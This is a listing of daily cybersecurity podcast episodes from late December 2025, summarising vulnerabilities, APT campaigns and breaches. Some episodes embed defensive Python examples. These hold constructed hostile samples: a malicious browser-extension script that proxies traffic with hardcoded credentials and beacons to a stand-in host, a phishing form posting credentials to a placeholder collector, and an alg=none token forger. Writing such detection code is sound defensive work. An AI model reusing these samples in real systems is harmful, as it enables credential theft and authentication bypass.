Episodes

  • RadioCSIRT English Edition – Your Cybersecurity News for Saturday, December 27, 2025 (Ep. 63)
    Dec 27 2025

    Welcome to your daily cybersecurity podcast.

    We open this edition with several security advisories published by CERT-FR regarding critical vulnerabilities affecting major components of the Linux ecosystem and enterprise environments. The bulletins notably concern Ubuntu, Red Hat, and IBM products, which are exposed to flaws that may allow privilege escalation, arbitrary code execution, or compromise of confidentiality. These vulnerabilities affect widely deployed components in server and cloud infrastructures, highlighting the need for rigorous patch management in critical environments.

    We then analyze a vulnerability affecting the Roundcube webmail, referenced as CVE-2025-68461. This flaw allows a remote attacker to exploit input handling mechanisms in order to compromise session security or execute malicious code in the context of the targeted user. Given the widespread use of Roundcube in email infrastructures, this vulnerability represents a significant risk for Internet-exposed organizations.

    Finally, we review a security vulnerability patched by Microsoft, identified as CVE-2025-13699. This flaw affects a Windows system component and may be exploited to bypass security mechanisms or gain elevated privileges. Microsoft has released fixes through its update guide and recommends prompt application to reduce the risk of active exploitation.

    Sources

    • CERT-FR – Ubuntu vulnerabilities: https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-1139/
    • CERT-FR – Red Hat vulnerabilities: https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-1141/
    • CERT-FR – IBM product vulnerabilities: https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-1137/
    • Roundcube vulnerability – CVE-2025-68461: https://cyberveille.esante.gouv.fr/alertes/roundcube-cve-2025-68461-2025-12-26
    • Microsoft – CVE-2025-13699: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-13699

    Don’t think, patch!

    Your feedback is welcome.
    Email: radiocsirt@gmail.com
    Website: https://www.radiocsirt.com
    Weekly Newsletter: https://radiocsirtenglishedition.substack.com/

    12 m
  • RadioCSIRT – English Edition – Your Cybersecurity News, Friday 26 December 2025 (Ep. 62)
    Dec 26 2025

    Welcome to your daily cybersecurity podcast.

    We open this edition with a case combining cybercrime and intelligence activities in Eastern Europe. In Georgia, the former head of counterintelligence has been arrested as part of an investigation into large-scale scam centers. Authorities suspect he facilitated or protected structured fraud operations targeting international victims, once again highlighting the convergence of organized crime, corruption, and cyber fraud.

    We then analyze a phishing campaign targeting cryptocurrency users through fake emails impersonating Grubhub. The messages promise a tenfold return on cryptocurrency sent by victims. Funds are immediately redirected to attacker-controlled wallets with no possibility of recovery, illustrating a classic yet still highly effective use of social engineering applied to digital assets.

    Finally, we examine an operation attributed to Evasive Panda, a China-linked threat actor, which conducted espionage activities using a hijacked DNS infrastructure. The attackers leveraged advanced DNS resolution and traffic redirection techniques to deliver stealthy malicious payloads while bypassing multiple network detection mechanisms. This campaign highlights the continued evolution of APT tradecraft in state-sponsored cyber espionage.

    Sources

    • Arrest in Georgia – scam centers: https://therecord.media/republic-of-georgia-former-spy-chief-arrested-scam-centers
    • Crypto phishing campaign – fake Grubhub emails: https://www.bleepingcomputer.com/news/security/fake-grubhub-emails-promise-tenfold-return-on-sent-cryptocurrency/
    • Evasive Panda APT – malicious DNS infrastructure: https://thehackernews.com/2025/12/china-linked-evasive-panda-ran-dns.html

    Don’t think, patch!

    Your feedback is welcome.
    Email: radiocsirt@gmail.com
    Website: https://www.radiocsirt.com
    Weekly Newsletter: https://radiocsirtenglishedition.substack.com/

    5 m
  • RadioCSIRT – English Edition – (Ep. 61)
    Dec 25 2025

    Welcome to your daily cybersecurity podcast.

    We open this edition with a geopolitical sequence marking a new phase in transatlantic tensions over digital regulation. The United States has imposed visa restrictions on several European figures involved in regulating technology platforms, including Thierry Breton, the former European Commissioner. Washington justifies the decision by accusing European regulators of extraterritorial censorship, notably in the enforcement of the Digital Services Act. The European Union condemned the measure and requested formal explanations, describing it as an attack on its regulatory sovereignty.

    We then analyze CVE-2018-25154, a critical buffer overflow vulnerability affecting GNU Barcode version 0.99. The flaw, linked to the Code 93 encoding mechanism, enables arbitrary code execution through crafted input files. The CVSS 3.1 score is critical at 9.8, with high impact on confidentiality, integrity, and availability.

    We also review CVE-2023-36525, an unauthenticated Blind SQL Injection affecting the WPJobBoard WordPress plugin up to version 5.9.0. The vulnerability is remotely exploitable without privileges or user interaction and exposes affected sites to data leakage and persistent modification risks.

    In the cybercrime segment, the FBI seized the web3adspanels.org infrastructure, used as a backend to centralize stolen banking credentials from phishing campaigns. The infrastructure enabled account takeover operations against financial institutions and remained active until late 2025.

    We then cover Urban VPN Proxy, a free VPN browser extension whose recent versions implement interception and exfiltration of AI platform conversations, including prompts, responses, and session metadata, enabled by default.

    Finally, we address the active exploitation of CVE-2020-12812 on FortiGate firewalls, an older vulnerability still abused to bypass 2FA through inconsistencies between FortiGate and LDAP username case handling.
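    The FortiGate item above is worth seeing as code, because the bug is a policy-lookup mismatch rather than a crypto or protocol weakness. The following is an added illustration written for these show notes, not Fortinet code and not a reproduction of the exploit: a constructed directory that matches usernames case-insensitively (as LDAP/AD does), a constructed local user table that is looked up case-sensitively, and a log-hunting helper over a made-up log format. The account, password and log lines are all constructed.

```python
"""
Model of the username-case mismatch behind CVE-2020-12812. Constructed
illustration, not Fortinet code: the directory (LDAP) accepts the username
case-insensitively, while the local user table that carries the two-factor
setting is looked up case-sensitively. A login typed with a different case
binds successfully but never reaches the entry that demands the second factor.
"""
from dataclasses import dataclass
import re


@dataclass
class LocalUser:
    name: str
    two_factor: bool


# Constructed sample data: the firewall's local user table and the
# directory's view of the same account (password is a placeholder).
LOCAL_USERS = {"jdoe": LocalUser("jdoe", two_factor=True)}
DIRECTORY = {"jdoe": "Winter2025!"}


def ldap_bind(username: str, password: str) -> bool:
    """LDAP/AD matches sAMAccountName case-insensitively."""
    return DIRECTORY.get(username.lower()) == password


def login_vulnerable(username: str, password: str, otp_ok: bool) -> str:
    if not ldap_bind(username, password):
        return "denied"
    user = LOCAL_USERS.get(username)  # case-sensitive lookup: the flaw
    if user is None or not user.two_factor:
        # Group membership still matches via LDAP, so access is granted
        # without ever evaluating the two-factor requirement.
        return "allowed-no-2fa"
    return "allowed-2fa" if otp_ok else "denied"


def login_fixed(username: str, password: str, otp_ok: bool) -> str:
    if not ldap_bind(username, password):
        return "denied"
    # Canonicalize before any policy lookup so the identity LDAP
    # authenticated is the identity the 2FA decision is made about.
    user = LOCAL_USERS.get(username.lower())
    if user is None:
        return "denied"  # unknown to policy: fail closed
    if not user.two_factor:
        return "allowed-no-2fa"
    return "allowed-2fa" if otp_ok else "denied"


# Hunting for exploitation attempts in authentication logs: a successful
# login whose username differs only in case from the configured account is
# the tell. The log format here is constructed for this example.
LOG_RE = re.compile(r'user="(?P<user>[^"]+)".*?status=(?P<status>\w+)')


def case_mismatch_logins(lines, known_users):
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m or m.group("status") != "success":
            continue
        u = m.group("user")
        if u.lower() in known_users and u not in known_users:
            hits.append(u)
    return hits


SAMPLE_LOG = [
    'date=2025-12-25 user="jdoe" action=login status=success 2fa=yes',
    'date=2025-12-25 user="JDoe" action=login status=success 2fa=no',
    'date=2025-12-25 user="jDOE" action=login status=failed',
]

if __name__ == "__main__":
    print(login_vulnerable("JDoe", "Winter2025!", otp_ok=False))  # bypass
    print(login_fixed("JDoe", "Winter2025!", otp_ok=False))       # denied
    print(case_mismatch_logins(SAMPLE_LOG, LOCAL_USERS))
```

    The fix is not "make the firewall case-sensitive too"; it is to canonicalize the identity once, before any policy decision, and to fail closed when the authenticated identity has no policy entry at all.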

    Sources

    • Tech regulation and USA–EU tensions: https://www.01net.com/actualites/pourquoi-les-etats-unis-sattaquent-a-thierry-breton-et-aux-autres-regulateurs-de-la-tech.html
    • CVE-2018-25154 – GNU Barcode buffer overflow: https://cvefeed.io/vuln/detail/CVE-2018-25154
    • CVE-2023-36525 – WPJobBoard Blind SQL Injection: https://cvefeed.io/vuln/detail/CVE-2023-36525
    • FBI seizure – web3adspanels.org: https://securityaffairs.com/186094/cyber-crime/fbi-seized-web3adspanels-org-hosting-stolen-logins.html
    • Urban VPN Proxy data harvesting: https://boingboing.net/2025/12/19/this-free-vpn-is-a-massive-security-risk.html
    • FortiGate 2FA bypass exploitation: https://cyberpress.org/hackers-abuse-3-year-old-fortigate-flaw/

    Don’t think, patch!

    Your feedback is welcome.
    Email: radiocsirt@gmail.com
    Website: https://www.radiocsirt.com
    Weekly Newsletter: https://radiocsirtenglishedition.substack.com/

    9 m
  • RadioCSIRT – English Edition – Your Daily Cybersecurity News – Wednesday, December 24, 2025 (Ep. 60)
    Dec 24 2025

    Welcome to your daily cybersecurity podcast.

    A new initiative brings together volunteer cybersecurity experts to help protect water utilities against growing cyber threats. Experienced professionals from the DEF CON Franklin community are paired with water service providers across several U.S. states to conduct assessments, map operational technology (OT) environments, and implement security measures tailored to critical infrastructure constraints. This community-driven model aims to offset limited internal resources and improve resilience against targeted industrial cyberattacks.

    MongoDB has issued an urgent warning urging administrators to immediately patch a severe remote code execution vulnerability affecting components of its ecosystem. The flaw could allow unauthenticated attackers to execute arbitrary code on exposed Node.js servers. Proof-of-concept exploits are publicly available, significantly increasing the risk of real-world exploitation.

    Security researchers have uncovered a large-scale compromise campaign involving the PCPcat malware, which exploited critical flaws in Next.js and React server components. More than 59,000 servers were compromised within 48 hours, with attackers harvesting credentials, SSH keys, and environment variables while establishing persistent access using stealthy processes and tunnels.

    In France, La Poste and its banking subsidiary, La Banque Postale, suffered major service disruptions following a distributed denial-of-service (DDoS) attack during the holiday period. Several online services, including parcel tracking and digital banking, were rendered unavailable. Authorities stated that no customer data was compromised.

    Finally, security teams are monitoring increased risks linked to modern JavaScript server stacks, highlighting how the rapid adoption of frameworks such as React and Next.js has expanded the attack surface for automated, industrial-scale exploitation.

    Sources:

    • Cyber volunteers / water utility / MSSP: https://therecord.media/cyber-volunteer-water-utility-mssp
    • MongoDB – severe RCE patch warning: https://www.bleepingcomputer.com/news/security/mongodb-warns-admins-to-patch-severe-rce-flaw-immediately/
    • PCPcat – React/Next.js servers breach: https://thecyberexpress.com/pcpcat-react-servers-nextjs-breach/
    • La Poste – outage after a cyber attack: https://securityaffairs.com/186064/security/la-poste-outage-after-a-cyber-attack.html

    Don’t think, patch!

    Your feedback is welcome.
    Email: radiocsirt@gmail.com
    Website: https://www.radiocsirt.com
    Weekly Newsletter: https://radiocsirtenglishedition.substack.com/

    7 m
  • RadioCSIRT English Edition – (Ep.59)
    Dec 23 2025

    Welcome to your daily cybersecurity podcast.

    CISA has added CVE-2023-52163 to its Known Exploited Vulnerabilities Catalog, confirming active exploitation of Digiever DS-2105 Pro network video recorders. This missing authorization flaw allows unauthenticated attackers to bypass security controls. While BOD 22-01 mandates federal agencies to remediate, CISA urges all organizations to prioritize firmware updates. This vulnerability serves as a frequent entry point for actors targeting IoT infrastructure and physical security networks.

    Genians Security Center reports on APT37's "Artemis" campaign targeting South Korean entities through malicious HWP documents. The attack chain leverages OLE objects and DLL side-loading via the legitimate VolumeId utility to deploy the RoKRAT module. The threat actor employs steganography within images and abuses cloud services like Yandex and pCloud for C2 operations. This multi-stage procedure leverages legitimate execution flows to evade detection by signature-based security solutions.

    SoundCloud disclosed a cyberattack targeting an ancillary service dashboard, resulting in a data leak affecting 26 million accounts. Exposed data includes email addresses and public profile information; passwords and financial data were not compromised. The incident was followed by DDoS attacks affecting availability. Remediation efforts, specifically reinforcing Identity and Access Management controls, inadvertently caused temporary connectivity issues for VPN users.

    Socket Security identified two malicious Chrome extensions, named Phantom Shuttle, stealing credentials from 170+ enterprise domains including AWS and GitHub. These extensions use onAuthRequired listeners to inject hardcoded proxy credentials and PAC scripts to reroute sensitive traffic. Operating as a Man-in-the-Middle, the malware exfiltrates plaintext credentials, session cookies, and API keys to the C2 server phantomshuttle[.]space every five minutes.
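    The Phantom Shuttle tradecraft above (proxy permission, a PAC script pushed through chrome.proxy.settings, an onAuthRequired listener returning hardcoded credentials) is easy to triage for offline. The script below is an added example for these show notes, not Socket's tooling and not the malicious extensions themselves: it walks an unpacked extension's manifest and scripts, flags that combination, and pulls out the proxy and beacon hosts. The two sample extensions are constructed in memory, and proxy.example / c2.example are placeholders, not the reported infrastructure.

```python
import json
import re

# Manifest permissions that together let an extension redirect traffic and
# answer proxy authentication challenges on the user's behalf.
PROXY_PERMS = {"proxy", "webRequest", "webRequestAuthProvider", "webRequestBlocking"}

# Code patterns seen when an extension silently routes traffic through a
# credentialed proxy: a PAC script installed via chrome.proxy.settings and an
# onAuthRequired listener handing back hardcoded credentials.
CODE_PATTERNS = {
    "onAuthRequired listener": re.compile(r"webRequest\.onAuthRequired\.addListener"),
    "proxy settings set": re.compile(r"proxy\.settings\.set\s*\("),
    "PAC script": re.compile(r"pacScript"),
    "authCredentials returned": re.compile(r"authCredentials\s*:"),
}
HOST_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)
PAC_PROXY_RE = re.compile(r"(?:PROXY|HTTPS)\s+([a-z0-9.-]+:\d+)", re.I)


def triage_extension(files):
    """files: {path: content} of an unpacked extension. Returns findings."""
    manifest = json.loads(files.get("manifest.json", "{}"))
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    findings = {
        "proxy_permissions": sorted(perms & PROXY_PERMS),
        "broad_hosts": sorted(p for p in perms if p in ("<all_urls>", "*://*/*")),
        "code_hits": [],
        "external_hosts": set(),
        "pac_proxies": set(),
    }
    for path, content in files.items():
        if not path.endswith(".js"):
            continue
        for label, pattern in CODE_PATTERNS.items():
            if pattern.search(content):
                findings["code_hits"].append(f"{path}: {label}")
        findings["external_hosts"].update(h.lower() for h in HOST_RE.findall(content))
        findings["pac_proxies"].update(PAC_PROXY_RE.findall(content))
    findings["external_hosts"] = sorted(findings["external_hosts"])
    findings["pac_proxies"] = sorted(findings["pac_proxies"])
    return findings


def risk_score(findings):
    """Crude ranking: proxy+webRequest together is the key combination."""
    score = 2 if {"proxy", "webRequest"} <= set(findings["proxy_permissions"]) else 0
    score += len(findings["code_hits"])
    score += 1 if findings["pac_proxies"] else 0
    return score


# Constructed samples (not the real extensions; hosts are placeholders).
MALICIOUS_SAMPLE = {
    "manifest.json": json.dumps({
        "manifest_version": 3,
        "name": "Shuttle Proxy Helper",
        "permissions": ["proxy", "webRequest", "webRequestAuthProvider", "storage"],
        "host_permissions": ["<all_urls>"],
        "background": {"service_worker": "background.js"},
    }),
    "background.js": """
const PAC = "function FindProxyForURL(url, host) {"
  + " if (host.endsWith('amazonaws.com') || host.endsWith('github.com'))"
  + " return 'PROXY proxy.example:8080'; return 'DIRECT'; }";
chrome.proxy.settings.set({ value: { mode: 'pac_script', pacScript: { data: PAC } }, scope: 'regular' });
chrome.webRequest.onAuthRequired.addListener(
  () => ({ authCredentials: { username: 'shuttle', password: 'hardcoded' } }),
  { urls: ['<all_urls>'] }, ['blocking']);
setInterval(() => fetch('https://c2.example/beacon'), 300000);
""",
}
BENIGN_SAMPLE = {
    "manifest.json": json.dumps({"manifest_version": 3, "name": "Notes", "permissions": ["storage"]}),
    "background.js": "chrome.storage.local.set({ created: Date.now() });",
}

if __name__ == "__main__":
    for name, files in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        f = triage_extension(files)
        print(name, risk_score(f), f["code_hits"], f["pac_proxies"], f["external_hosts"])
```

    Run it against the unpacked directory of any extension you are asked to vet; a PAC that selectively routes only identity-provider or cloud-console hosts, combined with an onAuthRequired listener, has no legitimate reason to exist in a "VPN helper".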

    Anna’s Archive released a 300-terabyte dataset containing 86 million scraped Spotify tracks. The breach was achieved through systematic stream-ripping using third-party user accounts over several months. Spotify responded by disabling offending accounts and implementing new safeguards to block automated playback patterns. This massive exfiltration of metadata and audio files represents a significant challenge for digital rights management and creator protection.

    Sources:
    • CISA KEV – Digiever: https://www.cisa.gov/news-events/alerts/2025/12/22/cisa-adds-one-known-exploited-vulnerability-catalog
    • APT37 Artemis: https://www.genians.co.kr/en/blog/threat_intelligence/dll
    • SoundCloud breach: https://www.theregister.com/2025/12/16/soundcloud_cyberattack_data_leak/
    • Chrome Phantom Shuttle: https://thehackernews.com/2025/12/two-chrome-extensions-caught-secretly.html
    • Spotify scraping: https://therecord.media/spotify-disables-scraping-annas

    Don’t think, patch!

    Your feedback is welcome.
    Email: radiocsirt@gmail.com
    Website: https://www.radiocsirt.com
    Weekly Newsletter: https://radiocsirtenglishedition.substack.com/

    7 m
  • RadioCSIRT English Edition – Your Cybersecurity News for Monday, December 22, 2025 (Ep.58)
    Dec 22 2025

    Welcome to your daily cybersecurity podcast.

    Pornhub alerts Premium subscribers following data exposure on November 8, 2025, via analytics provider Mixpanel. Cybercriminals threaten to directly contact affected users by email. Mixpanel disputes that data originated from its November 8 security incident, stating no evidence of exfiltration from its systems. Pornhub confirms passwords, payment details, and financial information remain uncompromised, with exposure limited to a restricted set of analytics events. Attackers exploit this data for sextortion campaigns specifically targeting identified Premium users.

    Intezer documents a Goffee group campaign targeting Russian military personnel and defense organizations. The initial attack, identified in October, uses a malicious XLL file titled "enemy's planned targets", uploaded to VirusTotal first from Ukraine and then from Russia. The file deploys the EchoGather backdoor to collect system information, execute commands, and exfiltrate files to a C2 server disguised as a food-delivery website. Phishing lures include a fake concert invitation for senior military officers and a letter impersonating Russia's Ministry of Industry and Trade requesting pricing-justification documents for defense contracts.

    CISA and NIST have released draft Interagency Report 8597 on protecting identity tokens and assertions against forgery, theft, and malicious use. The document responds to recent incidents at major cloud providers in which identity tokens were stolen, modified, or forged to reach protected resources. It covers IAM controls for systems that rely on digitally signed assertions and tokens in access decisions. NIST asks that CSPs apply Secure by Design principles, prioritizing transparency, configurability, and interoperability. Federal agencies must understand the architecture and deployment models of their CSPs in order to align their risk posture with the threat environment.
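    To make the "forgery, theft and malicious use" of the draft report concrete, here is an added example for these show notes, not text or code from NIST or CISA: a minimal verifier for signed tokens that closes the usual forgery paths (the token's own alg header selecting the verification path, including alg=none; claims read before the signature is checked; no audience or expiry check, which turns a token stolen from one service into a key for another). It uses HS256 with a constructed shared key so it runs offline; with RS256/ES256 assertions the checks are the same, only the signature primitive changes. Issuer, audience, key and clock value are all constructed.

```python
import base64
import hashlib
import hmac
import json
import time


class TokenError(Exception):
    pass


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    return _b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(claims: dict, key: bytes) -> str:
    """Issuer side: HS256-signed JWT in compact serialization."""
    signing_input = f"{_segment({'alg': 'HS256', 'typ': 'JWT'})}.{_segment(claims)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(sig)}"


def forge_alg_none(claims: dict) -> str:
    """What an attacker submits hoping the verifier honours alg=none."""
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(claims)}."


def verify_token(token: str, key: bytes, *, issuer: str, audience: str,
                 now=None, leeway: int = 30) -> dict:
    now = time.time() if now is None else now
    parts = token.split(".")
    if len(parts) != 3:
        raise TokenError("malformed token")
    h, p, s = parts
    header = json.loads(_b64url_decode(h))
    # Pin the algorithm on the verifier side; the token's 'alg' header is
    # attacker-controlled and must never choose the verification path.
    if header.get("alg") != "HS256":
        raise TokenError(f"unacceptable alg {header.get('alg')!r}")
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s)):
        raise TokenError("signature mismatch")
    # Only after the signature holds do the claims mean anything.
    claims = json.loads(_b64url_decode(p))
    if claims.get("iss") != issuer:
        raise TokenError("issuer mismatch")
    aud = claims.get("aud")
    aud = aud if isinstance(aud, list) else [aud]
    if audience not in aud:
        raise TokenError("audience mismatch")  # blocks replay against another service
    if "exp" not in claims or now > claims["exp"] + leeway:
        raise TokenError("expired or missing exp")
    if "nbf" in claims and now < claims["nbf"] - leeway:
        raise TokenError("not yet valid")
    return claims


def outcome(token, key, **kw):
    """Claims on success, otherwise the rejection reason as a string."""
    try:
        return verify_token(token, key, **kw)
    except TokenError as e:
        return str(e)


# Constructed sample: one issuer key, a fixed clock, one good token.
KEY = b"constructed-example-key-do-not-reuse"
NOW = 1_766_000_000
GOOD = {"iss": "https://idp.example", "aud": "api.example", "sub": "alice",
        "iat": NOW - 60, "exp": NOW + 300}

if __name__ == "__main__":
    tok = sign_hs256(GOOD, KEY)
    checks = dict(issuer="https://idp.example", audience="api.example", now=NOW)
    print(outcome(tok, KEY, **checks))
    print(outcome(forge_alg_none(dict(GOOD, sub="admin")), KEY, **checks))
    print(outcome(tok, KEY, issuer="https://idp.example", audience="other.example", now=NOW))
```

    The order matters: algorithm pin, then signature, then issuer, audience and time window, and only then is anything inside the token trusted. A verifier that reads the claims first, or that lets the token pick the algorithm, is the one the report's "forgery" scenarios are about.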

    Check Point Research documented GachiLoader, a heavily obfuscated Node.js loader distributed through the YouTube Ghost Network. The campaign leverages 39 compromised accounts spreading over 100 videos aimed at game-cheat users, accumulating 220,000 views since December 2024. The malware implements anti-analysis checks, including a 4 GB minimum RAM, 2 CPU cores, and blacklists of usernames, hostnames, and running processes. GachiLoader disables Windows Defender and adds exclusions for C:\Users, C:\ProgramData, C:\Windows, and the .sys extension. Two variants have been observed: the first downloads Rhadamanthys from C2 servers, while the second deploys Kidkadi.node, which uses a vectored overloading technique to intercept system calls and load a malicious PE.

    Sources:

    • Pornhub sextortion: https://www.malwarebytes.com/blog/news/2025/12/pornhub-tells-users-to-expect-sextortion-emails-after-data-exposure
    • Goffee APT: https://therecord.media/cyber-spies-fake-new-year-concert-russian-phishing
    • NIST/CISA tokens: https://www.cisa.gov/news-events/alerts/2025/12/22/nist-and-cisa-release-draft-interagency-report-protecting-tokens-and-assertions-tampering-theft-and
    • GachiLoader: https://research.checkpoint.com/2025/gachiloader-node-js-malware-with-api-tracing/

    Don’t think, patch!

    Your feedback is welcome.
    Email: radiocsirt@gmail.com
    Website: https://www.radiocsirt.com
    Weekly Newsletter: https://radiocsirtenglishedition.substack.com/

    7 m
  • RadioCSIRT English Version - Your Cybersecurity News for Sunday, December 21, 2025 (Ep.57)
    Dec 21 2025

    Welcome to your daily cybersecurity podcast.

    Most newly registered and parked domains are now serving malicious content. Analysis shows an increasing shift of domain parking services toward hosting phishing pages, fake software updates, and redirects to scam infrastructures. These domains are used as short-lived infrastructure to bypass reputation-based defenses and accelerate fraud and malware delivery campaigns.

    The Iranian APT group Infy has resurfaced with a new targeted campaign. Operations rely on spear-phishing emails delivering weaponized documents using political and diplomatic lures. Payloads include updated backdoors, Windows registry-based persistence mechanisms, and obfuscated HTTP(S) C2 channels, indicating a structured operational comeback.

    NIST has released new security guidance for the use of smart speakers in home-based telehealth environments. Identified risks include interception of unencrypted voice traffic, exposure of sensitive health data, and the use of these devices as pivot points into hospital systems. Recommended mitigations focus on encrypted communications, network segmentation, and strict access control.

    Sources:
    Malicious domain parking: https://krebsonsecurity.com/2025/12/most-parked-domains-now-serving-malicious-content/
    APT Infy: https://thehackernews.com/2025/12/iranian-infy-apt-resurfaces-with-new.html
    NIST smart speakers: https://www.nist.gov/news-events/news/2025/12/securing-smart-speakers-home-health-care-nist-offers-new-guidelines

    Don’t think, patch!

    Your feedback is welcome.
    Email: radiocsirt@gmail.com
    Website: https://www.radiocsirt.com
    Weekly Newsletter: https://radiocsirtenglishedition.substack.com/

    9 m
  • RadioCSIRT English Edition – Your Cybersecurity News for Saturday, December 20, 2025 (Ep.56)
    Dec 20 2025

    Welcome to your daily cybersecurity podcast.

    Amazon disclosed the detection of a North Korea-linked infiltration attempt during an IT hiring process. A system administrator claiming to be US-based was identified through persistent keyboard latency exceeding 110 milliseconds to Seattle servers, indicating intercontinental remote operation. The control infrastructure was traced to China. Since April 2024, Amazon reports having blocked more than 1,800 fraudulent hiring attempts linked to North Korea, with a 27 percent quarterly increase.

    A Russian APT actor is conducting a credential phishing campaign targeting government entities across the Baltics and the Balkans. The attacks rely on HTML attachments masquerading as PDF documents, embedding institutional decoys and fake authentication forms. Credentials are exfiltrated via formcarry.com, with consistent JavaScript and regex reuse observed since at least 2023.
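    The lure pattern above (an HTML attachment dressed up as a PDF, carrying a credential form that posts to a third-party form-collection service) can be caught at the mail gateway with a few structural checks rather than signatures. The script below is an added example for these show notes, not StrikeReady's detection logic: it checks the claimed extension against the file header, parses any forms, and flags password fields whose action points outside the sender's domain. The lure HTML and the collection host formcarry.example are constructed placeholders (the reported real endpoint is formcarry.com); the sender domain mfa.gov.example is likewise made up.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormCollector(HTMLParser):
    """Collects <form> targets, password inputs and script blocks."""

    def __init__(self):
        super().__init__()
        self.forms = []      # [{"action": str, "password_inputs": int}]
        self.scripts = 0
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password_inputs": 0}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None \
                and (a.get("type") or "").lower() == "password":
            self._current["password_inputs"] += 1
        elif tag == "script":
            self.scripts += 1

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def triage_attachment(filename: str, data: bytes, sender_domain: str) -> list:
    """Return the reasons an attachment deserves a closer look (empty = none)."""
    reasons = []
    head = data[:4096].lower()
    is_pdf = data.startswith(b"%PDF-")
    looks_html = any(tag in head for tag in (b"<html", b"<form", b"<script"))
    if filename.lower().endswith(".pdf") and not is_pdf:
        reasons.append("extension says PDF but the %PDF- header is missing")
    if not looks_html:
        return reasons
    reasons.append("attachment carries HTML markup")
    parser = FormCollector()
    parser.feed(data.decode("utf-8", errors="replace"))
    for form in parser.forms:
        host = (urlparse(form["action"]).hostname or "").lower()
        if form["password_inputs"] and host and not host.endswith(sender_domain):
            reasons.append(f"credential form posts to third party {host}")
    if parser.scripts:
        reasons.append(f"{parser.scripts} inline script block(s)")
    return reasons


# Constructed sample resembling the lure described above; the collection
# host is a placeholder, not the campaign's real endpoint.
LURE_HTML = b"""<html><body>
<h2>Ministry of Foreign Affairs - Protected document</h2>
<form action="https://formcarry.example/s/abc123" method="POST">
  <input type="email" name="email" placeholder="Official e-mail">
  <input type="password" name="password" placeholder="Password">
  <button>Open document</button>
</form>
<script>document.title = "Invitation.pdf";</script>
</body></html>"""

REAL_PDF = b"%PDF-1.7\n1 0 obj << /Type /Catalog >> endobj\n%%EOF\n"

if __name__ == "__main__":
    print(triage_attachment("Invitation.pdf.html", LURE_HTML, "mfa.gov.example"))
    print(triage_attachment("Invitation.pdf", LURE_HTML, "mfa.gov.example"))
    print(triage_attachment("Report.pdf", REAL_PDF, "mfa.gov.example"))
```

    The third-party-form check is the durable one: the campaign's JavaScript and regexes are reported to have been reused since 2023, but even when those change, a "document" that asks for a password and sends it somewhere other than the purported sender has nowhere to hide.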

    Microsoft confirmed a global Microsoft Teams outage impacting message delivery across all regions and clients. The incident started at 14:30 ET and was fully resolved one hour later. No indicators of malicious activity were reported.

    A malware campaign abuses Microsoft Office documents, SVG files, and compressed archives to compromise Windows systems. The attack chain exploits CVE-2017-11882, uses PNG steganography, and process hollowing via RegAsm.exe to deliver RATs and information stealers.

    ATM jackpotting attacks in the United States have been attributed to a criminal group deploying the Ploutus malware via physical access to ATMs. The tradecraft involves hard drive replacement or modification to control cash-dispensing modules. Losses are estimated to exceed $40 million since 2020.

    Don’t think, patch.

    Sources:

    • Amazon infiltration: https://www.clubic.com/actualite-592366-amazon-infiltre-par-un-espion-nord-coreen-finalement-repere-a-cause-de-sa-frappe-clavier.html
    • Russian APT phishing: https://strikeready.com/blog/russian-apt-actor-phishes-the-baltics-and-the-balkans/
    • Microsoft Teams outage: https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-teams-is-down-and-messages-are-delayed/
    • SVG and Office malware campaign: https://cybersecuritynews.com/hackers-weaponize-svg-files-and-office-documents/
    • ATM jackpotting / Ploutus malware: https://www.theregister.com/2025/12/19/tren_de_aragua_atm/

    Your feedback is welcome.
    Email: radiocsirt@gmail.com
    Website: https://www.radiocsirt.com
    Weekly Newsletter: https://radiocsirtenglishedition.substack.com/

    8 m